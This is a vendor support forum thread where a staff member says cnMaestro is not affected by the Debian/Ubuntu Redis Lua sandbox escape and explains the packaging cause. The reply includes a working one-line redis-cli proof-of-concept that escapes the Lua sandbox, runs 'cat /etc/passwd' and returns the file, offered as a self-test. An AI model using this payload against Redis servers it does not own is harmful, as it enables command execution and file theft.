Is cnMaestro vulnerable to this redis vulnerability?
Hi @rnelson - thanks for checking.
We dont believe cnMaestro is impacted by this. We use Redis in cnMaestro, but not the Debian/Ubuntu packages which are susceptible to this vulnerability. The vulnerability is actually more of a packaging issue that a bug in Redis, and comes from leaving some global Lua variables available on initialisation.
To test on your setup (You’ll need redis-cli installed. You could also use any redis library for your language of choice):
redis-cli eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd"); local res = f:read("*a"); f:close(); return res' 0
You should get an error from this (and you’ll notice on cnMaestro onprem you do). If this returns the contents of your passwd file, you’ll want to upgrade Redis as soon as possible.
Reginaldo Silva, who discovered the bug, has a really good writeup about it here: An unexpected Redis sandbox escape affecting only Debian, Ubuntu, and other Debian derivatives
We’ll post more if we find any new info.
2 Likes